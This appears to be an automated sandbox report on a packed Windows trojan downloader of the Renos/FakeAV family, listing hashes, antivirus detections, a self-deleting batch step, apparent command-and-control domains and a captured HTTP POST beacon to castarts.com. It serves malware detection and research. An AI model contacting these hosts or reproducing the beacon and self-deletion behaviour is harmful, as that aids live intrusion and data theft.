Analysis Date2015-01-27 10:40:28
MD511dc5f6d9a0d761ec43f2cb9f186fb86
SHA1859082daffc03f62f64148b64efa994ee88140fd

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.hgcc md5: 86d367568affa2d2bbe08f486c0a99c4 sha1: 5cd1ec44168991bfeb52dc9d74774fa5e0878d59 size: 12800
Section.imied md5: 87013d84abc3b48307ae5983af71b0c2 sha1: 93b900372afb7cd38f65984e447aaf678a3c05b9 size: 29184
Section.kellg md5: e722f6d628a76ade88a9f5021f10a442 sha1: 8efdcb681d8cdd419fe132c8a3c4d368fd2aa5dd size: 75264
Section.kkplh md5: 801acae00f035bc42becc83fae2c62cf sha1: 99b0d66af45a9e0e47b71089b944f47383ff8a32 size: 3072
Section.ojmd md5: 53e979547d8c2ea86560ac45de08ae25 sha1: 53ea2cb716f312714685c92b6be27e419f8c746c size: 1536
Section.rsrc md5: 8c579188851f0f1a8459b035a43b0e6b sha1: a5952bd2cc6aa83a31fc84fc57ae785425a81962 size: 1024
Timestamp2006-12-30 23:25:46
PEhash29e706d8de8db0788a677df589d1918b1d1a5a43
IMPhashda1b22a8b822889890c9b1386ccca77b
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.Renos.hyW@bSzL2@f
AVAlwil (avast)MalOb-EF [Cryp]
AVArcabit (arcavir)Gen:Trojan.Heur.Renos.hyW@bSzL2@f
AVAuthentiumW32/SuspPack.BL.gen!Eldorado
AVAvira (antivir)TR/Kazy.maklt
AVBullGuardGen:Trojan.Heur.Renos.hyW@bSzL2@f
AVCA (E-Trust Ino)Win32/Wardunlo.BN
AVCAT (quickheal)Win32.Packed.Krap.ag.6
AVClamAVTrojan.FakeAV-907
AVDr. WebTrojan.Packed.706
AVEmsisoftGen:Trojan.Heur.Renos.hyW@bSzL2@f
AVEset (nod32)Win32/Kryptik.BYC
AVFortinetW32/Kryptik.AG!tr
AVFrisk (f-prot)W32/SuspPack.BL.gen!Eldorado
AVF-SecureGen:Trojan.Heur.Renos.hyW@bSzL2@f
AVGrisoft (avg)Win32/Cryptor
AVIkarusTrojan.Win32.FakeAV
AVK7Error Scanning File
AVKasperskyTrojan.Win32.FraudPack.akht
AVMalwareBytesTrojan.Downloader
AVMcafeeDownloader-BWS
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Renos.KO
AVMicroWorld (escan)Gen:Trojan.Heur.Renos.hyW@bSzL2@f
AVRisingno_virus
AVSophosMal/FakeAV-CN
AVSymantecTrojan.FakeAV!gen20
AVTrend MicroTROJ_RENOS.SMJ2
AVVirusBlokAda (vba32)BScope.Trojan-Inject.Agent.0564

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecs ➝
15000
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Ogf..bat
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\Ogf..bat > nul 2> nul
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\Ogf..bat > nul 2> nul

Creates Filenul
Deletes FileC:\malware.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Ogf..bat

Network Details:

DNScastarts.com
Type: A
184.168.221.26
DNSnorth-arts-home.com
Type: A
DNSfamilygoarts.com
Type: A
HTTP POSThttp://castarts.com/img.php?data=v26MmjSySdfyUjV07AUYRrM7Y7/uI9E8OdYISX0iLBsOWQaH2BXayT3wBU3CcFXegcyUv84UKQiBMF4cFHrzf4yRtufQpaX/O/tpve7qlQ==
User-Agent: wget 3.0
Flows TCP192.168.1.1:1031 ➝ 184.168.221.26:80

Raw Pcap
0x00000000 (00000)   504f5354 202f696d 672e7068 703f6461   POST /img.php?da
0x00000010 (00016)   74613d76 32364d6d 6a537953 64667955   ta=v26MmjSySdfyU
0x00000020 (00032)   6a563037 41555952 724d3759 372f7549   jV07AUYRrM7Y7/uI
0x00000030 (00048)   3945384f 64594953 5830694c 42734f57   9E8OdYISX0iLBsOW
0x00000040 (00064)   51614832 42586179 54337742 55334363   QaH2BXayT3wBU3Cc
0x00000050 (00080)   46586567 63795576 3834554b 5169424d   FXegcyUv84UKQiBM
0x00000060 (00096)   46346346 48727a66 34795274 75665170   F4cFHrzf4yRtufQp
0x00000070 (00112)   61582f4f 2f747076 6537716c 513d3d20   aX/O/tpve7qlQ== 
0x00000080 (00128)   48545450 2f312e31 0d0a436f 6e74656e   HTTP/1.1..Conten
0x00000090 (00144)   742d5479 70653a20 6170706c 69636174   t-Type: applicat
0x000000a0 (00160)   696f6e2f 782d7777 772d666f 726d2d75   ion/x-www-form-u
0x000000b0 (00176)   726c656e 636f6465 640d0a48 6f73743a   rlencoded..Host:
0x000000c0 (00192)   20636173 74617274 732e636f 6d0d0a55    castarts.com..U
0x000000d0 (00208)   7365722d 4167656e 743a2077 67657420   ser-Agent: wget 
0x000000e0 (00224)   332e300d 0a436f6e 74656e74 2d4c656e   3.0..Content-Len
0x000000f0 (00240)   6774683a 20313231 0d0a436f 6e6e6563   gth: 121..Connec
0x00000100 (00256)   74696f6e 3a20636c 6f73650d 0a436163   tion: close..Cac
0x00000110 (00272)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000120 (00288)   61636865 0d0a0d0a 64617461 3d756a6e   ache....data=ujn
0x00000130 (00304)   5433324f 2f463971 73447941 7a36566c   T32O/F9qsDyAz6Vl
0x00000140 (00320)   4d533735 33502f58 34664d4d 78523930   MS753P/X4fMMxR90
0x00000150 (00336)   4e43436f 33645531 43485744 5a303065   NCCo3dU1CHWDZ00e
0x00000160 (00352)   43324879 32625379 47513058 5431702f   C2Hy2bSyGQ0XT1p/
0x00000170 (00368)   572f5a49 614a6b2b 4f644441 7a42324b   W/ZIaJk+OdDAzB2K
0x00000180 (00384)   364c746d 52314c61 432f716e 3949756b   6LtmR1LaC/qn9Iuk
0x00000190 (00400)   362b3732 33775761 2f536b54 7248413d   6+723wWa/SkTrHA=
0x000001a0 (00416)   3d                                    =


Strings
~.
RX.P.)S

!{[{=}
05-&GEFc
2I]Atc
2<^~m|
/<2Q7U
3~A8E`4
3h@tM[
4(DP7xl
4x">t|_9
"![5{0
^5+S1X
>60L$ 
_(6$2p
6&Du	|
|&6gfE
7AN0A37
7|iq+#
85 oTB
8 (PX@
9Qt4b=
Aa4?R8
advapi32.dll
A]fQ	C
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
"BH)ay
B%Pt):
cFq|PS
CopyIcon
CopyImage
 d}8M;
daRpE.e_*
DialogBoxParamA
?%=d!jem
dOxWnh
dZ6|I~
.e2<*V
"+eb+*
EndDialog
EtA>z0<V
ExitProcess
f1RG.~
~Fia=#
fJnY-qj
GeS4\d
GetScrollInfo
GetScrollPos
gskcsn
%G-Y^m
,/h}|0^f
HeapAlloc
hn]H3u
[hP<C{
`.imied
InsertMenuA
?<@IsC
:{K{3#
$!</"kaF
.kellg
kernel32.dll
	~K=F7
.kkplh
kP)-,S
ks[=#;
l@pwuEc8@2
n]+#H+@
N_k$*e
`Nn adl
?.NPqd be
N{S9Fzy`>F
<O@-_I
p0\t8l
P.ojmd
PTM#F/Y
>/QFu)hs
QGbI/k?
RegCreateKeyA
RegCreateKeyExW
RegOpenKeyA
RegOpenKeyW
RegQueryValueW
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
}r|#i0
s])b5m6
      </security>
      <security>
sx8*"=,y
t1$c>W3
t@&bfn|xw
!This program cannot be run in DOS mode.
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
t&|Rwu6i_
T?\uD#L
tuSxqbD
+tZ%`G
U&d]7^
uG.yAt
UKL`o6
user32.dll
,@Uv?	g74
'|V>KL
Vks}Iu
vVth^N
wa.<u$
-Wd:J/
WEY 4e
X*8%VT
~X9pth
xAeNGH
Xe=A!H^!
xKHk*a
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
y8J$"q
 ybS2:
,-Ykk/b
$~yrvndF
Z`3M#A
 zBYPm)
 ZLqX+"